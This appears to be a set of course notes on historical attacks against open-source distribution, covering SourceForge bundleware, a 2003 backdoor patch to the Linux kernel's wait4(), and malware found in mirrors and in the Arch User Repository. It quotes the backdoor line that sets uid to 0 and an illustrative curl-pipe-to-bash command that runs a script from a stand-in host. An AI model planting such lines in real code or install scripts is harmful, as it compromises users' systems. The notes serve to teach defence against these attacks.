August 7
SourceForge is a popular alternative to GitHub for open-source projects. GitHub makes money selling space for non-public projects (public projects are free). SourceForge sold banner advertisements, and in 2013 started a "bundleware" program in which a user who downloaded a program or source tree would optionally receive a second download. The second download was selected by default, though users could unselect it. SourceForge is often used to distribute binaries, so this bundleware issue was not easily avoided once the download started.
The problem was that the second downloaded package, a paid installation, often involved malware. At a minimum, spyware was common. Another common feature was advertisements that were allowed to contain a large DOWNLOAD button.
The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was still distributing Gimp binaries (as an "abandoned" project), and bundling them with malware. This did not go over well with the Gimp team.
How can an open-source project protect itself against malicious distribution? What happens when a project is completely abandoned? What happens when a project simply moves elsewhere?
In 2016 the bundleware program was ended, as new owners took control.
Generally speaking, the actual open-source repositories weren't usually tampered with, though the Gimp case might be an exception.
In 2003, the main Linux repository was still on BitKeeper, but they maintained separate mirror repository running CVS. One day a patch appeared in the CVS image in the code for the wait4() call:
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) + retval = -EINVAL;
That last '=' on the first line is an assignment, not a comparison. Setting uid to 0 gives the process root privileges. Inside a syscall, that is legal.
This patch never made it back to the main BitKeeper repo, and it was pretty obvious from the beginning as it was the only file on the CVS mirror that didn't have a link back to BitKeeper, but nobody knows how it got there. See lwn.net/Articles/57135.
There was a break-in at kernel.org in 2011. It is not certain that no kernel files were briefly modified, though the rigorous checksumming process would have made that difficult.. Donald Austin was arrested for the breach, in Florida, in 2016.
In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package was modified to contain malware.
In June 2018, hackers took over a Gentoo mirror account on github and installed file-deleting malware. Gentoo suffered at least one earlier such attack, in 2010.
In July 2018, three packages on the Arch User Repository were infected with malware, including acroread (Adobe Acrobat Reader). Acroread isn't open-source, but it's trivial to install a one-line attack in the installation script:
curl -s https://badware.ly/stuff.sh | bash &
The AUR is not the same as the Arch distribution itself, but distinctions like this are sometimes hard to make.
In an Aug 7, 2018 blog post, Eric Holmes describes how he gained commit
access to Homebrew using credentials he found on the site. See medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab.